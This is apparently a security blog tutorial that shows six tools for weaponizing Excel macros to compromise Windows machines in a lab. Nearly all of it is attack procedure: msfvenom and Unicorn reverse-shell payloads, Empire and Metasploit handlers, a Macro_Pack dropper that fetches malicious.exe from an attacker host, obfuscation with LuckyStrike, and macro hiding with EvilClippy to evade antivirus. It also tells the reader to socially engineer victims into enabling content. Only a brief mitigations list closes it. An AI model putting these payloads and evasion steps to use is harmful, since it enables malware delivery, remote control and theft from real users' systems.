Multiple Ways to Exploit Windows Systems using Macros

at 8:13 AM Wednesday, February 26, 2020

TL; DR
In this article, we will be exploring a total of 6 tools that can craft, encrypt and exploit a Windows Machine using malicious Macros.
Table of Content
·         Introduction
o   What are Macros?
o   Why Macros are Dangerous
·         Exploitation
o   Practical #1: Empire
o   Practical #2: Unicorn
o   Practical #3: Metasploit
o   Practical #4: LuckyStrike
o   Practical #5: Macro_Pack
o   Practical #6: Evil Clipper
·         Mitigations
Introduction
What are Macros?
Whenever you are working with an Excel File or Word File for an instance and you want a certain repetitive task that you wish just got automated without your intervention. This was the issue that was faced by the users of the newly built Microsoft Office. Microsoft came to a solution for this by creating what we know as Macros. Macros are quite essentially just Visual Basic Scripts that can be crafted and shared and it works in the background without any knowledge of the user (if enabled.).
Why Macros are Dangerous?
 Now that you get what macros mean in a nutshell, it is not that difficult to wrap your head around the fact that running scripts in the background that can be crafted and altered and shared are bound to used as a way to exploit machines. What attacker does is that they generate a very harmless looking file in the Microsoft Office. Then they open up the Macros Editor and then craft a script that could generate a session form the target user to the attacker. The basic flow is the same for almost all tools. But the techniques that each tool uses in the background are quite different than another.
Exploitation
Now that we have established what are Macros and understood the risks, let’s see how it can affect the real-life scenarios. We have created a Lab Environment with Kali Linux, Windows 10 and other tools. We are going to exploit a Windows System using 5 different tools.
Practical #1: Empire
To use the Empire on Kali Linux, we need to install Empire Framework on your Attacker Machine. This is a pretty simple process. If you are facing some trouble, then refer to this article. After a successful installation, we will fire up the framework. We checked for the active listeners using the “listeners” command. As we can see that no listeners were running. Now, let’s create one. We created an HTTP Listener. After that, we need to create a stager for that listener that we just created. As our demonstration is based on Macros, we will be using the same for the stager. We will link the listener to the stager and just execute the config. This will create a stager in the “/tmp/macro”.
listeners
uselisteners http
execute
back
usestager windows/macro
set Listener http
execute

Moving on to the Target Machine, as we are doing this demonstration in a Lab Environment, it is easier to execute the following steps. We take a Normal Excel File and enter some data into it. Then we click on the “VIEW” Tab. In this tab, we will be selecting the Macros Option.

Clicking on the Macros will open up a small window as depicted in the image given below. Here, we are asked for the name of the Macro. This can be anything you want. After entering the name, click on the Create button to get started.

Here we have a blank module in which we can draft a Macro. We went back to our Kali Machine and copied the code that was generated by the Empire. Then Pasted the contents of that macro file into this blank module as shown in the image given below.


After pasting the code, we choose the Save As option from the menu. It opens up a window. In this window, we name the file and We choose Excel Macro-Enabled Workbook as shown in the image given below.  We click the Save button after filling in the necessary details.

Back in earlier days, this was all that is need to do. But seeing the rise in the Macro related attacks in the normal Office Environment, Microsoft has added some more verification on the User End to stop some attacks. Now we open a new Excel Workbook. We choose the “File” tab. In this tab, we Click the Options Section as shown in the image given below.

Clicking the Options Section will open a small window as shown in the image given below. Now the left-hand side menu of this window, there is a section called Trust Center. We opened it to find some privacy and security related settings. Here, we have a subsection called “Microsoft Excel Trust Center”, we open its settings by clicking the “Trust Center Settings” button

This opens up another window, Here we have a section called Macro Settings. We click on it. It gives us a total of 4 Macro policies each one against a radio button. We have the “Disable all macros with notification” policy selected by default. We change it to “Enable all macros” policy and close the window.

Now we open our Workbook that has the malicious macros injected in it. It opens up without any hindrance or warnings or prompts. We went back to our attacker machine and check the Empire to find that one of our agent is active. We used the agents command to take a look. Here we see that we have an agent. We tried to access the agent using the interact command. This was the procedure that needs to be followed if we want to exploit a target using the combination of Empire and Macros.
agents
interact FPSN1YAW
info

Practical #2: Unicorn
It’s time to check another tool that could help us compromise the target using the macros. For this practical, we use the Unicorn Tool. For a more detailed guide on the Unicorn tool, check out this awesome guide. The payload creation in the unicorn is quite simple. We will have to state the payload as we would in crafting payload using MSFvenom. Then, we need to provide the IP Address and the port at which the session would generate and provide the macro keyword as depicted below.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.106 443 macro

This creates a text file and a “.rc” file with the same name and on the same destination.

We run the command shown by the unicorn to create a listener for our payload.
msfconsole -r unicorn.rc
Now we need the macros enabled in Excel to accomplish this attack. In our lab environment, we enabled the macros in the previous practical when we were trying to exploit the target using Empire. So, After that, we open an Excel file and follow the steps to create a macro. After opening the macros editor module, we paste the data that was inside the text file that was created by Unicorn and then saves the Excel workbook as the Macros Enabled Excel on the Target System.
After saving the Malicious macros enabled Excel, we open the Excel on the Target System. It gives a Compatibility Error as shown in the image given below.


But when we move back to our attacker machine, we see that our payload has generated a meterpreter shell on the Target Machine. We can access this meterpreter session using the sessions command followed by the session id as shown in the image given below.

Practical #3: Metasploit
Let’s move on to a rather basic approach. This approach is quite detectable by almost all the Antivirus tools as the signature of the Metasploit Payload is quite common. Still to understand the basic attack and to perform in a lab environment, we will be using the Metasploit for exploiting our target via Marcos.  
To get started, we need to craft a payload. We will be using MSFvenom for crafting the payload. We used the reverse_http payload for this demonstration. We stated the Local IP Address of the Attacker Machine i.e., Kali Linux. We also need to provide a Local port for the session to get generated on. After generating the payload with the proper configuration for the vba payload, we copy the vba payload content and then move onto to the target machine.
 msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.106 lport=1234 -f vba

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit


Practical #4: LuckyStrike
Let’s move on to the next tool in our arsenal, Lucky Strike. It uses the “Invoke-Obfuscation” tool to obfuscate the payloads. So we downloaded it as well as LuckyStrike form GitHub.

In order for Invoke Obfuscation to work and get accessed by LuckyStrike, we need to move the Invoke Obfuscation tool to the PowerShell Modules directory as shown in the image given below.

Now that the initial configuration of LuckyStrike is done, we need to move on to the Installation Phase. In Windows 10 by default, there is a policy called Execution Policy which restricts the user to run scripts on the system. We need to alter that policy to run LuckyStrike. After making changes to the Execution Policy, we moved to the LuckyStrike directory. Here, we see that we have an install.ps1 script. We run the script. We are asked a bunch of Confirmations; we state Yes to all. After running the install script, we have the LuckyStrike in the System.
cd C:\Users\raj\Desktop\luckystrike-master
Set-ExecutionPolicy Unrestricted
ls
.\install.ps1


Now, before firing up our LuckyStrike, we need to have a payload that will generate the session. We used a one-line PowerShell script for the same. Save this file with the ps1 extension and then we will move on to obfuscate it using LuckyStrike.


Now that we have our payload, let’s run the LuckyStrike. As soon as we run the LuckyStrike, we have a beautiful banner and the Main Menu. In this menu we have multiple options like Payload, Catalog, File, etc., We choose the Catalog Options by entering the number 2. This gave us a sub-menu titled, “Catalog Options”. Here we have the configurations that can be done on the Payload and Templates. Before moving any further we need to add the payload that we just created in the LuckyStrike Catalog. Do this by entering number 1.
cd .\luckystrike\
.\luckystrike.ps1

After the Selection of the payload, we were asked for the title for the payload. Then it asks us for the Target IP address and Port. These are optional parameters hence we skipped them by hitting enter. In the description, we state “netcat” for our reference. Next, we need to choose the payload type. Now we need to choose the payload type. As we created a PowerShell Script for the payload, we choose the same. Then LuckyStrike asks us for the path of the payload file. After doing it due diligence LuckyStrike adds the payload in its Catalog.  

Now in order to move ahead, we need to get to the Main Menu. This can be achieved using the number 99. In the Main Menu, we need to select the Payload Options. This can be achieved using number 1. This will give us a submenu of Payload Options. In this menu, we need to select the payload using the number 1. After getting inside the Select the payload option, we are asked for the type of file we want as an output. We choose the Excel File. This will send us the list of added payloads. Here we have the revshell payload that we added earlier. After choosing the payload, we are asked for the type of Infection. This is the method that LuckyStrike will use to Obfuscate. We choose the nonB64 method. You can choose any method of your preference as per your requirement.

Now that the payload is added. Then we get back to the Main Menu to generate the final malicious Excel File. In the Main Menu, we chose the File options by entering number 3. In the File Options menu, we choose the Generate the new file option by entering number 1. This will initiate the process of creating an Excel with malicious payload inside its macro. After creating the payload, LuckyStrike gives us the location of the payload.

We open the given location inside the Windows Explorer to find an Excel file by the name infected. Now we need to share this file with Target and encourage him/her to open the file and enable the macros.

We will do this while on the Kali Machine, we run the listener with the port that we mentioned in the payload during its creation. Now, as soon as the target enables the macros on the Excel File we will have its PowerShell Session as shown in the image given below.
nc -lvp 1234

Practical #5: Macro_Pack
The next tool on our list is the Macro_Pack. The working of this tool is quite similar to the working of the LuckyStrike. First, we need a payload in which we generate the session. For this, we will be using the MSFVenom tool. In our Kali Machine, we ran the MSFVenom tool and crafted a payload as shown in the image given below.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=6666 -f exe >> malicious.exe

After the creation of payload, we will run a python one-liner and host the payload on the local port 80.
After this we will move to our Windows Machine, here we will download the tool and then use the macro_pack to create an Excel File that is embedded with the malicious payload. This can be achieved using the one-liner mentioned below.
echo “http://192.168.152.131/malicious.exe” “dropped.exe” | .\macro_pack.exe -o -t DROPPER -G “drop.xlsm”

We went to the location, where the Macro_packer created the payload and then use some of our social engineering skills to transfer the payload to the Target Victim.

We sent the payload to the Target and then opened the Excel Workbook. To find the Security Warning as shown in the image given below. Before doing any of this make sure that you have the listener running to capture the session generated by the payload. As everything set, as soon as the target user clicks on the Enable Content, we have the meterpreter session of the user.

We set up the listener for the same payload that we used while generation using the MSFVenom tool. We also provide the Local IP Address of our Kali Machine and the port that we mentioned during crafting the payload.
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.152.131
set lport 6666
run


Practical #6: Evil Clipper
If you were a Windows XP user with the old version of Microsoft Office, there is a chance you must have come across the animated clip mascot that was used by Microsoft at that time. This tool is a remembrance to that tool, what would happen if that cipper went Evil and hide the macros details. How? Let’s find out.
As always we need to craft a payload that could give back a reverse HTTPS session. We provide the Local IP Address of the Kali Machine as well as the port that will capture the session generated by the said payload. We generate this payload in the VBA format. After the generation of the payload, we copy the contents of payload on our clipboard and move on to our Windows Machine.
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.152.131 lport=1234 -f vba

Here, we used the git clone command to clone the Evil Clippy tool to our Windows Machine. For this particular step, we need to install git on Windows. Also, add git to PATH Variable as well.
git clone https://github.com/outflanknl/EvilClippy.git

After cloning the EvilClippy git and look for the files. In these files, we see that we don’t have an executable. We will build an executable using the csc from the Visual Studio C# Compiler. After the building, we see that we have an executable inside the same directory. We try to run the executable as shown in the image given below.   
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
.\EvilClippy.exe -h

Next, we open an Excel Workbook. And then create macros as we did earlier in this article. In the image given below, we name our macro “malicious” and click on the create button.

As soon as we click on the create button, we have the Microsoft Visual Basic for Applications to draft the macros. Here we paste the payload code in VBS that we create at the beginning of the practical.

Next, we need to save this malicious macro-enabled Excel in the xlsm format in the same directory as the EvilClippy with all its configuration files. Now we will use the EvilClippt to hide the modules in the malicious macro that could trigger any Antivirus alert or any manual inspection by the user.
ls
.\EvilClippy.exe -g malicious.xlsm

After the EvilClippy worked with the malicious  Excel, we went back to open the file to check if the modules were really removed in Excel itself.

As we can observe from the above screenshot that the malicious macros cannot be found anywhere in the Macro Editor of the Excel File. This doesn’t mean that the macro is deleted from the file. All EvilClippy did was hide the macro inside the Excel File and when the macro gets executed and we have a listener created that have the same configurations as the payload. We can gain a meterpreter session as shown in the image given below.
use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.152.131
set lport 1234
run
sysinfo

Mitigations
·         Microsoft Office Macros should be disabled in the organization.
·         Enable the Feature to block the macros in the documents that originate from the internet. [Office 2016, Office 365]
·         If the usage of macros is unavoidable, only enable the users or groups that absolutely need to use the capabilities of the macro.
·         Allowing only signed macros can also reduce the number of attacks that could be successful.
·         Use the Trusted Locations feature of the Microsoft Office Trust Centre. This means only the settings configured at the Trusted Location will be in action regardless of the local configurations.
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)